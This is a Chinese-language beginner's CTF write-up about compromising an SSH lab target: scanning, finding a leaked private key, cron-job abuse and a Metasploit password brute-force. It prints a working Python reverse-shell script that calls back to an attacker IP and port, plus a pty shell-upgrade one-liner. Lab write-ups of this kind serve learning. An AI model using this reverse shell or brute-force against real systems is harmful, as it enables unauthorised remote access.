小白学习CTF第二天-SSH服务渗透

SSH服务协议

昨天是针对SSH私钥泄露进行的具体操作，今天针对SSH服务协议进行渗透。

SSH协议介绍

SSH协议认证机制

SSH协议验证机制弱点

信息探测

在基本的了解了SSH的基本内容之后，我们开始针对今天的靶场进行渗透：

信息探测的方式很多，后面跟的参数不同，导致实现的具体功能有别。在探测之前，还是要知道我们攻击机以及靶场的IP地址（具体看图，这里就不重复了）接下来我们开始简单的进行测试：

分析探测结果

探测之后我们要进行探测结果的分析。
我们发现此靶场开放了http服务，我们使用浏览器进行测试：

可以看到这里有一些用户名，还有一些其他的消息，这些用户名，还是很关键的。除了直接浏览器访问之外，还有别的渗透方法。

在对于隐藏文件的探测中，我们看到了一些文件例如files或者icons这些都可以去尝试打开链接，看看有没有隐藏的信息。

在这里我们发现了一个非常奇怪的文件，打开看看，竟然是私钥信息，有用。

挖掘敏感信息

接下来我们继续挖掘敏感信息，没准我们可能发现更多的信息。

使用nikto扫描之后得到的结果：

从这里我们可以看到一些开放的服务，以及一些敏感文件，这和我们之前的分析没有太大出入。一些敏感的位置，都可以去试一试，有的可能没有有效信息，但是也还是要继续尝试的。

利用敏感弱点信息

下载私钥

之后我们把下载的文件改一下名字，方便后面的操作。

我们看一下所下载私钥的权限，如果权限不够，我们需要赋予权限。

使用所下载的私钥，以及我们之前的所得到用户名，进行远程登陆：

登陆成功之后，我们进行分析，看看有无有效信息。

并没有有效的信息，同时我们也无法直接进行提权，这样我们要尝试别的方法进行提权操作。

扩大战果

使用这个可能存在的定时任务，通过反弹shell的方式，进行尝试提权操作。

查看所有用户列表：

深入挖掘

如上面所提到的，使用这个可能存在的定时任务，通过反弹shell的方式，进行尝试提权操作。

执行相应的命令，我们发现有个每隔5分钟就会执行的定时任务：

反弹shell

#!/usr/bin/python
import socket,os,subprocess
s = socket.socket()
s.connect(("192.168.56.104",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p = subprocess.call(["bin/sh","-i"])

使用如上的代码格式，就可以去尝试反弹shell，但是在这之前需要先检查一下端口的使用情况：

之后再相应的tmp中创建相应的文件，写入相应的代码：

创建完，更改完文件名字之后，使其变成可执行文件：

最后再开启另一个端口，进行监听：

在反弹了shell之后，我们尝试进行提权操作（但是这个还是没有成功）：

背水一战

前两个提权失败了，我们只能尝试最后一个用户名了：

首先git clone一下字典文件：

之后我们执行相应可可执行文件，采用交互式执行：

前期工作基本上完成。

使用metasploit进行破解SSH

依据上面的命令，相应的执行：


相应的参数设置完毕，run一下，进行密码破解，最后破解出来密码是hadi123，在设置相应的密码，进行登陆（这里没有展示出破解密码的过程，run一下会执行）。
注：如果知道密码之后直接设置set passwd hadi123 可能会出现错误，这个时候我们重新启动msfconsole就可以这次在加上set passwd hadi123，其余的不变，最后run一下就可以成功登陆。

我们成功登陆了，但是发现这个界面不是很好看，我们可以进行下一步优化终端。

优化终端

在终端输入以下命令：

python -c "import pty;pty.spawn('/bin/bash')"

优化后的结果：

我们这次知道了密码，进行提权操作：

OK！拿下靶场！

总结

继续加油吧！第二天打卡！